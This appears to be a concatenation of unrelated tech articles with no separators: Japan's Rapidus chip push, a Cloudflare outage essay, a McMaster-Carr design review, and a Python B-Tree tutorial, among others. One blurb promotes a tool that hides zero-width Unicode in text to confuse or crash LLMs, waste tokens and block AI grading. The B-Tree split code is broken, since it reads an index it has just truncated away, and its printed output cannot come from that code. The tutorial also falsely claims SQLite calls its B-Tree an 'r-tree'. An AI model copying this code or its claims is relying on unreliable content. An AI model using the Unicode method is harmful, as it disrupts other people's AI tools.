weapons inventory systems currently in use. RuBee probably has a bright future, as a
niche technology for a niche industry. If nothing else, they have legacy installations
and intellectual property to lean on. A spreadsheet of VAI-owned patents on RuBee,
with nearly 200 rows, encourages would-be magnetically coupled visibility network inventors
not to go it on their own. I just wish I could get my hands on a controller....
Japan's gamble to turn island of Hokkaido into global chip hub
Suranjana Tewari
Asia business correspondent, Hokkaido, Japan
Getty Images
Hokkaido is a tourism and agricultural region, but Rapidus is making chips there too
The island of Hokkaido has long been an agricultural powerhouse – now Japan is investing billions to turn it into a global hub for advanced semiconductors.
More than half of Japan's dairy produce comes from Hokkaido, the northernmost of its main islands. In winter, it's a wonderland of ski resorts and ice-sculpture festivals; in summer, fields bloom with bands of lavender, poppies and sunflowers.
These days, cranes are popping up across the island – building factories, research centres and universities focused on technology. It's part of Japan's boldest industrial push in a generation: an attempt to reboot the country's chip-making capabilities and reshape its economic future.
Locals say that beyond the cattle and tourism, Hokkaido has long lacked other industries. There's even a saying that those who go there do so only to leave.
But if the government succeeds in turning Hokkaido into Japan's answer to Silicon Valley - or "Hokkaido Valley", as some have begun to call it - the country could become a new contender in the $600bn (£458bn) race to supply the world's computer chips.
An unlikely player
At the heart of the plan is Rapidus, a little-known company backed by the government and some of Japan's biggest corporations including Toyota, Softbank and Sony.
Born out of a partnership with IBM, it has raised billions of dollars to build Japan's first cutting-edge chip foundry in decades.
The government has invested $12bn in the company, so that it can build a massive semiconductor factory or "fab" in the small city of Chitose.
In selecting the Hokkaido location, Rapidus CEO Atsuyoshi Koike points to Chitose's water, electricity infrastructure and its natural beauty.
Mr Koike oversaw the fab design, which will be completely covered in grass to harmonise with Hokkaido's landscape, he told the BBC.
Local authorities have also flagged the region as being at lower risk of earthquakes compared to other potential sites in Japan.
A key milestone for Rapidus came with the delivery of an extreme ultraviolet lithography (EUV) system from the Dutch company ASML.
The high-tech machinery helped bring about Rapidus' biggest accomplishment yet earlier this year – the successful production of prototype two nanometre (2nm) transistors.
These ultra-thin chips are at the cutting edge of semiconductor technology and allow devices to run faster and more efficiently.
It's a feat only rival chip makers TSMC and Samsung have accomplished. Intel is not pursuing 2nm, it is leapfrogging from 7nm straight to 1.8nm.
"We succeeded in manufacturing the 2nm prototype for the first time in Japan, and at an unprecedented speed in Japan and globally," Mr Koike said.
He credits the IBM partnership for helping achieve the breakthrough.
Tie-ups with global companies are essential to acquiring the technology needed for this level of chips, he added.
The sceptics
Rapidus is confident that it is on track to mass produce 2nm chips by 2027. The challenge will be achieving the yield and quality that is needed to survive in an incredibly competitive market – the very areas where Taiwan and South Korea have pulled ahead.
TSMC for example has achieved incredible success in mass production, but making high-end chips is costly and technically demanding.
In a 2024 report, the Asean+3 Macroeconomic Research Office highlighted that although Rapidus is receiving government subsidies and consortium members are contributing funds: "The financing falls short of the expected 5 trillion yen ($31.8bn; £24.4bn) needed to start mass production."
The Center for Security and International Studies (CSIS) has previously said: "Rapidus has no experience in manufacturing advanced chips, and to date there is no indication that it will be able to access actual know-how for such an endeavour from companies with the requisite experience (ie TSMC and Samsung)."
Finding customers may also be a challenge – Samsung and TSMC have established relationships with global companies that have been buying their chips for years.
The lost decades
Nevertheless, Japan's government is pouring money into the chip industry - $27bn between 2020 and early 2024 - a larger commitment relative to its gross domestic product (GDP) than the US made through the
Biden-era CHIPS Act
.
In late 2024, Tokyo unveiled a $65bn package for Artificial Intelligence (AI) and semiconductors that could further support Rapidus's expansion plans.
This comes after decades of decline. Forty years ago Japan made more than half of the world's semiconductors. Today, it produces just over 10%.
Many point to US-Japan trade tensions in the 1980s as a turning point.
Naoyuki Yoshino, professor emeritus at Keio University, said Japan lost out in the technology stakes to Taiwan and South Korea in the 1980s, leaving domestic companies weaker.
Unlike its rivals, Japan failed to sustain subsidies to keep its chipmakers competitive.
But Mr Koike says that mentality has changed.
"The [national] government and local government are united in supporting our industry to revive once again."
Getty Images
Rapidus has already achieved a production prototype of a 2nm chip
Japan's broader economic challenges also loom large. Its population is shrinking while the number of elderly citizens continues to surge. That has determined the national budget for years and has contributed to slowing growth.
More than a third of its budget now goes to social welfare for the elderly, and that squeezes the money available for research, education and technology, Prof Yoshino says.
Japan also faces a severe shortage of semiconductor engineers – an estimated 40,000 people in the coming years.
Rapidus is partnering with Hokkaido University and others to train new workers, but agrees it will have to rely heavily on foreigners, at a time when public support for workers coming into the country for employment is low.
Growing an ecosystem
The government's push is already attracting major global players.
TSMC is producing 12–28nm chips in Kumamoto, on the south-western island of Kyushu - a significant step for Japan, even if it lags behind the company's cutting-edge production in Taiwan.
The expansion has transformed the local economy, attracting suppliers, raising wages, and leading to infrastructure and service developments.
Japan's broader chip revival strategy appears to be following a playbook: establish a "fab", and an entire ecosystem will tend to follow.
TSMC started building a second plant on Kyushu in October this year, which is due to begin production by the end of 2027.
Beyond Rapidus and TSMC, local players like Kioxia and Toshiba are also getting government backing.
Kioxia has expanded fabs in Yokkaichi and Kitakami with state funds and Toshiba has built one in Ishikawa. Meanwhile, ROHM has been officially designated as a company that provides critical products under Tokyo's economic security framework.
American memory chipmaker Micron will also receive $3.63bn in subsidies from the Japanese government to grow facilities in Hiroshima, while Samsung is building a research and development facility in Yokohama.
Hokkaido is seeing similar momentum. Chipmaking equipment companies ASML and Tokyo Electron have both opened offices in Chitose, off the back of Rapidus building a production facility there.
"This will make a form of 'global ecosystem'," Mr Koike says, "where we work together to be able to produce semiconductors that contribute to the world."
Getty Images
The CEO of Rapidus says the firm's edge is bespoke chips that can be delivered quickly
Mr Koike said Rapidus's key selling point would be - as its name suggests - an ability to produce custom chips faster than competitors, rather than competing directly with other players.
"TSMC leads the world, with Intel and Samsung close behind. Our edge is speed - we can produce and deliver chips three to four times faster than anyone else. That speed is what gives us an edge in the global semiconductor race," Mr Koike said.
Big bet
Global demand for chips is surging with the rise of AI, while Japan's automakers - still recovering from pandemic-era supply shocks - are pressing for more reliable, domestically or regionally sourced production across the entire supply chain, from raw materials to finished chips.
Securing control over chip manufacturing is being seen as a national security priority, both in Japan and elsewhere, as recent trade frictions and geopolitical tensions between China and Taiwan raise concerns around the risks of relying on foreign suppliers.
"We'd like to provide products from Japan once again – products that are powerful and with great new value," Mr Koike said.
For Japan's government, investing in Rapidus is a high-stakes gamble to revive its semiconductor industry and more broadly its tech power.
And some analysts say it may be the country's best chance to build a domestic ecosystem to supply advanced chips to its many manufacturers, and one day become a formidable challenger in the global market.
Cloudflare, the CDN provider, suffered a massive outage today. Some of the world's most popular apps and web services were left inaccessible for serveral hours whilst the Cloudflare team scrambled to fix a whole swathe of the internet.
And that might be a good thing.
The proximate cause of the outage was pretty mundane:
a bad config file triggered a latent bug in one of Cloudflare's services
. The file was too large (details still hazy) and this led to a cascading failure across Cloudflare operations. Probably there is some useful post-morteming about canary releases and staged rollouts.
But the bigger problem, the ultimate cause, behind today's chaos is the creeping centralisation of the internet and a society that is sleepwalking into assuming the net is
always on
and
always working
.
It's not just "trivial" stuff like Twitter and
League of Legends
that were affected, either. A friend of mine remarked caustically about his experience this morning
I couldn't get air for my tyres at two garages because of cloudflare going down.
Bloody love the lack of resilience that goes into the design when the machine says "cash only" and there's no cash slot.
So flat tires for everyone! Brilliant.
We are living in a society where every part of our lives is increasingly mediated through the internet: work, banking, retail, education, entertainment, dating, family, government ID and credit checks. And the internet is increasingly tied up in
fewer and fewer points of failure
.
It's ironic because the internet was actually designed for decentralisation, a system that governments could use to coordinate their response in the event of nuclear war. But due to the economics of the internet, the challenges of things like bots and scrapers, more of more web services are holed up in citadels like AWS or behind content distribution networks like Cloudflare.
Outages like today's are a good thing because they're a
warning
. They can force redundancy and resilience into systems. They can make the pillars of our society - governments, businesses, banks - provide reliable alternatives when things go wrong.
(Ideally ones that are completely offline)
You can draw a parallel to how COVID-19 shook up global supply chains: the logic up until 2020 was that you wanted your system to be as lean and efficient as possible, even if it meant relying totally on international supplies or keeping as little spare inventory as possible. After 2020 businesses realised they needed to diversify and build slack in the system to tolerate shocks.
In the same way that growing one kind of banana,
nearly resulted in bananas going extinct
, we're drifing towards a society that can't survive without digital infrastructure; and a digital infrastructure that can't operate without two or three key players. One day there's going to be an outage, a bug, or cyberattack from a hostile state, that demonstrates how fragile that system is.
Embrace outages, and build redundancy.
A free tool that stuns LLMs with thousands of invisible Unicode characters
Block AIs from reading your text with invisible Unicode characters while preserving meaning for humans.
How it works:
This tool inserts invisible zero-width Unicode characters between each character of your input text. The text will look the same but will be much longer and can help stop AI plagarism. It also helps to waste tokens, causing users to run into ratelimits faster.
How to use:
This tool works best when gibberifying the most important parts of an essay prompt, up to about 500 characters. This makes it harder for the AI to detect while still functioning well in Google Docs. Some AI models will crash or fail to process the gibberified text, while others will respond with confusion or simply ignore everything inside the gibberified text.
Use cases:
Anti-plagiarism, text obfuscation for LLM scrapers, or just for fun!
Even just one word's worth of gibberified text is enough to block something like Flint AI from grading a session.
‘Enshittification’: how we got the internet no one asked for – podcast
Guardian
www.theguardian.com
2025-11-24 03:00:25
Tech critic Corey Doctorow explains why for so many the internet – from Amazon to Google to Instagram – seems to be getting worse Do you ever get the feeling that the internet isn’t what it used to be? Well, tech critic Corey Doctorow thinks you’re right – and he has a term to describe it too: ‘ensh...
Tech critic
Corey Doctorow
explains why for so many the internet – from Amazon to Google to Instagram – seems to be getting worse
Do you ever get the feeling that the internet isn’t what it used to be?
Well, tech critic
Corey Doctorow
thinks you’re right – and he has a term to describe it too: ‘enshittification’.
He lays out his three-step theory to
Nosheen Iqbal
, explaining why sites from Amazon to Google to
Instagram
seem to offer a worsening experience … and what can be done to stop it.
Photograph: gorodenkoff/Getty Images
McMaster Carr – The Smartest Website You Haven't Heard Of
Most people I know haven't even heard of it, but
mcmaster.com
is the best e-commerce site I've ever used.
McMaster-Carr is an industrial supply company. They sell nuts, bolts, bushings, bearings – pretty much anything an engineer needs to build stuff. I've purchased from them dozens of times over the past few years, both for personal and school projects.
But what makes their website so great? And why should an industrial supply company have the best e-commerce site on the internet?
mcmaster.com
is great because it does what it needs to, and nothing else.
First, let's look at the visual design of the site. Minimal, mostly grayscale, with accents of green and yellow. There are no popups, animations, banners, carousels, or videos – just a calm, static page with categories and a search bar. Even the images are grayscale, to avoid inadvertently catching your eye.
It's not the most visually stunning site, but that doesn't matter here - McMaster has chosen function over form.
A user's goal when they visit McMaster-Carr is to find their part as quickly as possible. The website is designed entirely around that fact. Users rarely come just to browse, so there are no AI recommendation algorithms, featured products, new arrivals – that doesn't make sense in this context. People visit McMaster-Carr with high intent to buy a specific part, that's it.
So how do we get from the 700,000 products in their catalog down to one part? Here's what I do.
Let's say I'm searching for a bolt:
I type "bolt" into the search bar
McMaster shows me several subcategories: hex head, socket head, set screws, etc. I'm looking for socket head, so I select that one.
Now I move my attention to the left nav bar, which shows me several filtering options. Bolts are commonly specified by their
thread size
(e.g. 1/4"-20), and their length. I'm looking for a 1/4"-20 x 1" bolt, meaning that the bolt's diameter is 1/4" and its length is 1", so I select these filters.
There are over a dozen other filters, such as material, hardness, and head size. Once I've applied enough filters, The main search window shows individual items, rather than subcategories. Here I can select an item and add it to cart.
McMaster's search interface is the main reason for its design superiority. Everything on this page is designed to get you to your part as quickly as possible. The filter sections are simple and elegant, providing schematic illustrations when necessary. The illustrations are always simplified to convey only relevant information, as to not distract you from the focus of your search.
Results pages also show helpful drop-downs which explain the parts you're looking at. It's like an engineer's handbook and catalog in one. Engineers are often looking up terminology on the fly anyways, so having this information embedded into the site saves valuable time.
McMaster's filters are not only useful for a targeted search, but also for deciding what it is you want. Sometimes I'll search with only a general idea of the part I need, and then I'll use the subcategory descriptions to determine specifics. For example, I may know that I need some type of lock washer, but I'm unsure which one is best for my application. I can use the images and descriptions to decide on the right configuration.
many varieties of lock washers
McMaster is able to provide such intuitive searching and filtering because everything that they sell is highly legible – it's all defined by quantitative specs. There is nothing intangible to deal with, like brands, product photos, or other marketing fluff. Even still, they do a much better job than other industrial websites like
Grainger
,
DigiKey
, or
Home Depot
.
As a point of comparison, Amazon does a terrible job of filtering items. Amazon has an order of magnitude more products on its site, which admittedly makes the job a lot more difficult. However, even generic filters, like price, suck. I won't get too far into my disdain for amazon's UI design, other people have already written too much about it [1] and that's not the point, but it's interesting to contrast McMaster with what everyone sees as "the" e-commerce site.
Take Amazon's price picker: Why is it two text boxes? Why not a slider? This has always annoyed me, since it's much easier for me to drag a slider than to manually type in my max price. And the quick-select ranges are literally the exact same no matter the product. If I search for a pen, nearly every result I want should be under $25. If I search for a trampoline, every result I want should probably be over $200. What the fuck?! I guess this somehow won the A/B test, but I can't think of a reason why.
Amazon Price Filter
Finally, one of the most brilliant parts of McMaster's product is that for nearly every part, they have a CAD file that you can instantly download into your 3D models. Mechanical engineers mock up designs in CAD programs before actually building them, and having access to pre-modeled parts saves time. (Imagine having to manually model all your nuts and bolts.) McMaster even has
extensions
for popular CAD programs which allow you to import part files directly, instead of using their website. This makes engineer's lives 10x easier (not to mention making them more likely to purchase from McMaster-Carr). The closest analogy to this is AR try-on, but that's not even very accurate. The point of AR try-on is to determine whether you like the item you're about to buy, whereas the point of McMaster's CAD downloads is to speed up an engineer's workflow. In most cases, they already know which part they need, it's just a matter of completing the CAD model before they can start building the real thing.
Improvements
Mcmaster.com
is nearly perfect. It's a website that would make
Steve Krug
smile. My only suggestion would be to make the search bar on the home page more prominent. It's visually overwhelming to comb through dozens of product photos, so I pretty much always use the search bar to start narrowing down items. The main area of the homepage is effectively dead space, while the search bar is relatively tiny. New users might miss it, wasting time.
I decided to write about McMaster-Carr because it is so rare to see such careful thought go into an industrial web app, far removed from the commotion of silicon valley, web3, D2C, and the other typical subjects of pixel perfection.
Mcmaster.com
is a product that understands its customer. The minimal, functional design allows users to find their parts as quickly as possible, nothing more or less. It's an unexpected reminder to not get lost in the allure of smooth gradients, 3D animations, or slick fonts, and instead relentlessly focus on what it is your customers really want.
"If something is 100 percent functional, it is always beautiful...there is no such thing as an ugly nail or an ugly hammer but there's lots of ugly cars, because not everything in a car is functional...sometimes it's very beautiful, if the person who designed it has very good taste, but sometimes it's ugly." [2]
Footnotes
[1] "Jeff Bezos is an infamous micro-manager. He micro-manages every single pixel of Amazon's retail site. He hired Larry Tesler, Apple's Chief Scientist and probably the very most famous and respected human-computer interaction expert in the entire world, and then ignored every goddamn thing Larry said for three years until Larry finally -- wisely -- left the company. Larry would do these big usability studies and demonstrate beyond any shred of doubt that nobody can understand that frigging website, but Bezos just couldn't let go of those pixels, all those millions of semantics-packed pixels on the landing page. They were like millions of his own precious children. So they're all still there, and Larry is not."
https://gist.github.com/chitchcock/1281611
Your database has 10 million user records. You query for one user by ID. The database returns the result in 3 milliseconds. How?
If the database scanned all 10 million records sequentially, it would take seconds, maybe minutes. But databases don’t scan. They use an index—and that index is almost certainly a B-Tree.
Every major database system uses B-Trees: MySQL InnoDB, PostgreSQL, SQLite, MongoDB’s WiredTiger storage engine, Oracle Database, Microsoft SQL Server. It’s not a coincidence. B-Trees solve a fundamental problem: how to efficiently find data on disk when disk access is thousands of times slower than memory access.
This is the story of why binary search trees fail on disk, how B-Trees fix that problem, and why after 50+ years, we’re still using them.
Let’s start with what doesn’t work: binary search trees (BSTs) on disk.
In memory, binary search trees are excellent. Each node stores one key and has two children (left and right). Keys in the left subtree are smaller, keys in the right subtree are larger. Finding a key takes O(log₂ n) comparisons.
Figure 1: Binary search tree with 7 nodes. Finding key 11 takes 3 comparisons: 15 → 7 → 11.
For 1 million records, a balanced BST has height log₂(1,000,000) ≈ 20. That’s 20 comparisons to find any record.
In memory, this is fast.
Each comparison is a pointer dereference (~0.0001 milliseconds on modern CPUs). Total lookup: 0.002 ms.
On disk, this is catastrophic.
Here’s why:
The smallest unit of disk access is a block (typically 4 KB to 16 KB). To read a single byte from disk, you must read the entire block containing it.
Disk access times:
Disk is 100-100,000x slower than RAM.
With a BST on disk, each node is stored in a separate disk block. Traversing from parent to child requires a disk seek.
For 1 million records:
Height: 20 nodes
Disk seeks: 20
Time on HDD: 20 × 10 ms =
200 milliseconds
Time on SSD: 20 × 0.1 ms =
2 milliseconds
That’s acceptable for SSDs, but terrible for HDDs. And it gets worse as the tree grows.
For 1 billion records:
Height: 30 nodes
Time on HDD: 30 × 10 ms =
300 milliseconds
Time on SSD: 30 × 0.1 ms =
3 milliseconds
The fundamental problem:
BST fanout is too low (only 2 children per node). We need more children per node to reduce tree height.
You might think: “Just keep the tree balanced!” Red-black trees and AVL trees do this.
The problem isn’t just tree height—it’s maintenance cost. Balancing requires rotating nodes and updating pointers. In memory, this is cheap (a few pointer writes). On disk, it’s expensive:
Read the node from disk (4 KB block)
Modify the node in memory
Write the modified node back to disk (4 KB block)
Update parent pointers (more disk I/O)
For a tree with frequent inserts and deletes, constant rebalancing kills performance. We need a data structure that:
Has high fanout (many children per node) → reduces height
A B-Tree is a self-balancing tree optimized for disk access. Instead of 2 children per node (binary tree), a B-Tree node has
hundreds or thousands
of children.
Key idea:
Each B-Tree node fits in one disk block (4 KB to 16 KB). Since we must read an entire block anyway, pack as many keys as possible into it.
A B-Tree node stores:
N keys
(sorted)
N + 1 pointers
to child nodes
Each key acts as a separator: keys in child[i] are less than key[i], keys in child[i+1] are greater than or equal to key[i].
Figure 2: B-Tree with fanout ~100. Root has 2 keys and 3 children. Internal nodes have 4 keys and 5 children. Leaf nodes contain actual data.
B-Trees have three types of nodes:
Root node:
The top of the tree. There’s always exactly one root.
Internal nodes:
Middle layers that guide searches. They store separator keys and pointers, but no actual data.
Leaf nodes:
Bottom layer containing the actual data (key-value pairs). All leaves are at the same depth.
This is a
B+-Tree
, the most common variant. B+-Trees store data only in leaves, while B-Trees can store data in internal nodes too. Every major database uses B+-Trees, but calls them “B-Trees” for simplicity.
Binary tree (fanout = 2):
1 million records → height = 20
1 billion records → height = 30
B-Tree (fanout = 100):
1 million records → height = 3 (because 100³ = 1,000,000)
Finding a key in a B-Tree is a root-to-leaf traversal with binary search at each node.
Algorithm:
Start at the root node
Binary search the keys in the current node to find the separator key range
Follow the corresponding child pointer
Repeat until reaching a leaf node
In the leaf, either find the key or conclude it doesn’t exist
Time complexity:
Tree height: O(log_fanout n)
Binary search per node: O(log₂ fanout)
Total: O(log n)
Example:
Find key 72 in a B-Tree with fanout 100 and 1 million records.
Step 1: Read root node (1 disk I/O)
Keys: [50, 100, 150, ...]
72 is between 50 and 100
Follow child pointer 2
Step 2: Read internal node (1 disk I/O)
Keys: [55, 60, 65, 70, 75, 80, ...]
72 is between 70 and 75
Follow child pointer 5
Step 3: Read leaf node (1 disk I/O)
Keys: [71, 72, 73, 74]
Found! Return value for key 72
Total: 3 disk I/O operations = 30 ms on HDD, 0.3 ms on SSD
Let’s implement a simplified but functional B-Tree in Python.
from typing import List, Optional, Tuple
from dataclasses import dataclass, field
@dataclass
class BTreeNode:
“”“
B-Tree node storing keys and child pointers.
Attributes:
keys: Sorted list of keys in this node
children: List of child node pointers (len = len(keys) + 1)
is_leaf: True if this is a leaf node (no children)
Invariants:
- len(children) == len(keys) + 1 (for internal nodes)
- All keys are sorted
- Keys in children[i] < keys[i] < keys in children[i+1]
“”“
keys: List[int] = field(default_factory=list)
children: List[’BTreeNode’] = field(default_factory=list)
is_leaf: bool = True
def __repr__(self):
return f”BTreeNode(keys={self.keys}, is_leaf={self.is_leaf})”
class BTree:
“”“
B-Tree implementation with configurable order.
Attributes:
order: Maximum number of children per node (fanout)
root: Root node of the tree
Properties:
- Each node has at most (order - 1) keys
- Each non-root node has at least (order // 2 - 1) keys
- Tree height is O(log_order n)
Time Complexity:
- Search: O(log n)
- Insert: O(log n)
- Delete: O(log n)
Space Complexity: O(n)
“”“
def __init__(self, order: int = 100):
“”“
Initialize B-Tree.
Args:
order: Maximum number of children per node (fanout).
Higher order = fewer levels but larger nodes.
Typical values: 100-1000 for disk-based storage.
“”“
if order < 3:
raise ValueError(”Order must be at least 3”)
self.order = order
self.root = BTreeNode()
def search(self, key: int) -> Optional[int]:
“”“
Search for a key in the B-Tree.
Args:
key: The key to search for
Returns:
The key if found, None otherwise
Time Complexity: O(log n) where n is number of keys
“”“
return self._search_recursive(self.root, key)
def _search_recursive(self, node: BTreeNode, key: int) -> Optional[int]:
“”“
Recursively search for key starting from node.
Uses binary search within each node to find the correct child.
“”“
# Binary search within this node
i = self._binary_search(node.keys, key)
# Found exact match
if i < len(node.keys) and node.keys[i] == key:
return key
# Reached leaf without finding key
if node.is_leaf:
return None
# Recurse into appropriate child
# (In real implementation, this would be a disk I/O)
return self._search_recursive(node.children[i], key)
def _binary_search(self, keys: List[int], key: int) -> int:
“”“
Binary search to find insertion point for key.
Returns:
Index i where keys[i-1] < key <= keys[i]
Time Complexity: O(log m) where m is number of keys in node
“”“
left, right = 0, len(keys)
while left < right:
mid = (left + right) // 2
if keys[mid] < key:
left = mid + 1
else:
right = mid
return left
def insert(self, key: int):
“”“
Insert a key into the B-Tree.
Args:
key: The key to insert
Time Complexity: O(log n)
Algorithm:
1. Find the appropriate leaf node
2. Insert key into leaf
3. If leaf overflows (too many keys), split it
4. Propagate split up the tree if necessary
“”“
root = self.root
# If root is full, split it and create new root
if len(root.keys) >= self.order - 1:
new_root = BTreeNode(is_leaf=False)
new_root.children.append(self.root)
self._split_child(new_root, 0)
self.root = new_root
self._insert_non_full(self.root, key)
def _insert_non_full(self, node: BTreeNode, key: int):
“”“
Insert key into a node that is not full.
Recursively finds the correct leaf and inserts.
“”“
i = len(node.keys) - 1
if node.is_leaf:
# Insert into sorted position
node.keys.append(None) # Make space
while i >= 0 and key < node.keys[i]:
node.keys[i + 1] = node.keys[i]
i -= 1
node.keys[i + 1] = key
else:
# Find child to insert into
while i >= 0 and key < node.keys[i]:
i -= 1
i += 1
# Split child if it’s full
if len(node.children[i].keys) >= self.order - 1:
self._split_child(node, i)
if key > node.keys[i]:
i += 1
self._insert_non_full(node.children[i], key)
def _split_child(self, parent: BTreeNode, child_index: int):
“”“
Split a full child node into two nodes.
Args:
parent: Parent node containing the full child
child_index: Index of the full child in parent.children
Algorithm:
1. Create new sibling node
2. Move half of keys from full child to sibling
3. Promote middle key to parent
4. Update parent’s children list
“”“
full_child = parent.children[child_index]
new_sibling = BTreeNode(is_leaf=full_child.is_leaf)
mid = (self.order - 1) // 2
# Move half the keys to new sibling
new_sibling.keys = full_child.keys[mid + 1:]
full_child.keys = full_child.keys[:mid]
# Move half the children if not a leaf
if not full_child.is_leaf:
new_sibling.children = full_child.children[mid + 1:]
full_child.children = full_child.children[:mid + 1]
# Promote middle key to parent
promoted_key = full_child.keys[mid] if full_child.is_leaf else full_child.keys[mid]
parent.keys.insert(child_index, promoted_key)
parent.children.insert(child_index + 1, new_sibling)
def print_tree(self, node: Optional[BTreeNode] = None, level: int = 0):
“”“
Print tree structure for debugging.
“”“
if node is None:
node = self.root
print(” “ * level + f”Level {level}: {node.keys}”)
if not node.is_leaf:
for child in node.children:
self.print_tree(child, level + 1)
# Example usage and demonstration
if __name__ == “__main__”:
# Create B-Tree with order 5 (max 4 keys per node)
btree = BTree(order=5)
# Insert keys
keys = [10, 20, 5, 6, 12, 30, 7, 17, 3, 16, 21, 24, 25, 26, 27]
print(”Inserting keys:”, keys)
for key in keys:
btree.insert(key)
print(”\nB-Tree structure:”)
btree.print_tree()
# Search for keys
print(”\nSearching for keys:”)
for search_key in [6, 16, 21, 100]:
result = btree.search(search_key)
if result:
print(f” Key {search_key}: FOUND”)
else:
print(f” Key {search_key}: NOT FOUND”)
# Demonstrate disk I/O count
print(”\n--- Performance Analysis ---”)
print(f”Tree order (fanout): {btree.order}”)
print(f”Max keys per node: {btree.order - 1}”)
# Estimate tree height for large datasets
def estimate_height(num_records: int, fanout: int) -> int:
“”“Estimate tree height for given number of records and fanout.”“”
import math
return math.ceil(math.log(num_records, fanout))
datasets = [
(”1 thousand”, 1_000),
(”1 million”, 1_000_000),
(”1 billion”, 1_000_000_000),
]
fanouts = [5, 100, 1000]
print(”\nEstimated tree height (= disk seeks):”)
print(f”{’Dataset’:<15} {’Fanout=5’:<10} {’Fanout=100’:<12} {’Fanout=1000’:<12}”)
for name, size in datasets:
heights = [estimate_height(size, f) for f in fanouts]
print(f”{name:<15} {heights[0]:<10} {heights[1]:<12} {heights[2]:<12}”)
print(”\nDisk access time on HDD (10ms per seek):”)
print(f”{’Dataset’:<15} {’Fanout=5’:<10} {’Fanout=100’:<12} {’Fanout=1000’:<12}”)
for name, size in datasets:
times = [f”{estimate_height(size, f) * 10}ms” for f in fanouts]
print(f”{name:<15} {times[0]:<10} {times[1]:<12} {times[2]:<12}”)
Output:
Inserting keys: [10, 20, 5, 6, 12, 30, 7, 17, 3, 16, 21, 24, 25, 26, 27]
B-Tree structure:
Level 0: [12, 20, 25]
Level 1: [3, 5, 6, 7, 10]
Level 1: [16, 17]
Level 1: [21, 24]
Level 1: [26, 27, 30]
Searching for keys:
Key 6: FOUND
Key 16: FOUND
Key 21: FOUND
Key 100: NOT FOUND
--- Performance Analysis ---
Tree order (fanout): 5
Max keys per node: 4
Estimated tree height (= disk seeks):
Dataset Fanout=5 Fanout=100 Fanout=1000
1 thousand 5 2 1
1 million 9 3 2
1 billion 13 5 3
Disk access time on HDD (10ms per seek):
Dataset Fanout=5 Fanout=100 Fanout=1000
1 thousand 50ms 20ms 10ms
1 million 90ms 30ms 20ms
1 billion 130ms 50ms 30ms
Why this implementation works:
Each node stores up to
order - 1
keys
Split operation maintains the B-Tree invariants
Binary search within nodes reduces comparisons
Tree height stays logarithmic
When you insert a key into a full leaf node, the node must split.
Split algorithm:
Find the midpoint of the full node
Create a new sibling node
Move half the keys to the new node
Promote the middle key to the parent
If parent is full, split it recursively
Figure 3: Node split during insertion. The full node is split at the midpoint, and the middle key (30) is promoted to the parent.
When splits propagate to the root:
The root is split into two nodes
A new root is created with one key (the promoted key from the old root)
Tree height increases by 1
This is the only way tree height increases in a B-Tree.
B-Trees grow upward from the leaves, not downward from the root.
When you delete a key from a node and it becomes too empty (below 50% capacity), it merges with a sibling.
Merge algorithm:
Copy all keys from right sibling to left sibling
Demote the separator key from parent into the merged node
Remove the right sibling
If parent becomes too empty, merge it recursively
Figure 4: Node merge during deletion. When the right node becomes too empty, it merges with the left node, pulling the separator key from the parent.
When merges propagate to the root:
If the root has only one child after a merge, that child becomes the new root
Tree height decreases by 1
Splits and merges keep the tree balanced. All leaf nodes remain at the same depth, ensuring consistent query performance.
Time complexity:
O(log n)
For a tree with n keys and fanout f:
Tree height: log_f(n)
Binary search per node: log₂(f)
Total comparisons: log_f(n) × log₂(f) = O(log n)
Disk I/O:
log_f(n) disk reads (one per level)
Time complexity:
O(log n)
Lookup to find insertion point: O(log n)
Insert into leaf: O(f) to shift keys
Split if necessary: O(f) to move keys
Splits propagate up: O(log n) levels in worst case
Disk I/O:
O(log n) disk reads + O(log n) disk writes
Time complexity:
O(log n)
Lookup to find key: O(log n)
Delete from leaf: O(f) to shift keys
Merge if necessary: O(f) to move keys
Merges propagate up: O(log n) levels in worst case
Disk I/O:
O(log n) disk reads + O(log n) disk writes
Space:
O(n)
Each key is stored once. Internal nodes add overhead (pointers and separator keys), but this is typically 10-20% of data size.
Occupancy:
Nodes are typically 50-90% full. Higher fanout improves space efficiency because pointer overhead becomes proportionally smaller.
Every major database uses B-Trees (or B+-Trees) for indexes.
InnoDB uses B+-Trees for:
Primary key index
(clustered index): Stores actual row data in leaf nodes
Secondary indexes
: Store pointers to primary key in leaf nodes
InnoDB B-Tree configuration:
Page size: 16 KB (default)
Fanout: ~100-200 depending on key size
Tree height for 1 million rows: 3-4 levels
Example:
-- Create table with primary key
CREATE TABLE users (
id INT PRIMARY KEY,
name VARCHAR(100),
email VARCHAR(100)
) ENGINE=InnoDB;
-- Primary key automatically creates a clustered B+-Tree index
-- Leaf nodes contain the actual row data
-- Tree structure: id=1 stored with name and email in leaf
-- Create secondary index on email
CREATE INDEX idx_email ON users(email);
-- Secondary index is a separate B+-Tree
-- Leaf nodes contain email → id mappings
-- To fetch full row: lookup email in idx_email → get id → lookup id in primary key
InnoDB query performance:
-- Fast: Uses B-Tree index
SELECT * FROM users WHERE id = 12345;
-- Disk I/O: 3-4 reads (tree height)
-- Slow: Full table scan
SELECT * FROM users WHERE name = ‘Alice’;
-- Disk I/O: 10,000+ reads (scan all pages)
-- Fast: Uses secondary index
SELECT * FROM users WHERE email = ‘alice@example.com’;
-- Disk I/O: 6-8 reads (3-4 for idx_email + 3-4 for primary key)
PostgreSQL uses B-Trees as the default index type.
PostgreSQL B-Tree configuration:
Page size: 8 KB (default)
Fanout: ~50-100 depending on key size
Supports multiple index types (B-Tree, Hash, GiST, GIN, BRIN), but B-Tree is default
Example:
-- Default index is B-Tree
CREATE INDEX idx_user_id ON users(id);
-- Explicitly specify B-Tree
CREATE INDEX idx_user_email ON users USING BTREE(email);
-- View index structure
SELECT * FROM pg_indexes WHERE tablename = ‘users’;
SQLite uses B-Trees for both tables and indexes.
SQLite B-Tree configuration:
Page size: 4 KB (default, configurable to 64 KB)
Fanout: ~50-100
All data is stored in B-Trees (no separate heap storage)
Interesting fact:
SQLite calls its B-Tree implementation “r-tree” for historical reasons, but it’s actually a B+-Tree.
MongoDB’s WiredTiger storage engine uses B-Trees for indexes.
WiredTiger B-Tree configuration:
Internal page size: 4 KB (default)
Leaf page size: 32 KB (default)
Fanout: ~100-200
Supports prefix compression to increase fanout
Example:
// MongoDB creates B-Tree index on _id by default
db.users.insertOne({ _id: 1, name: “Alice”, email: “alice@example.com” });
// Create secondary index (B-Tree)
db.users.createIndex({ email: 1 });
// Query uses B-Tree index
db.users.find({ email: “alice@example.com” });
// Disk I/O: 3-4 reads (tree height)
// Explain shows index usage
db.users.find({ email: “alice@example.com” }).explain();
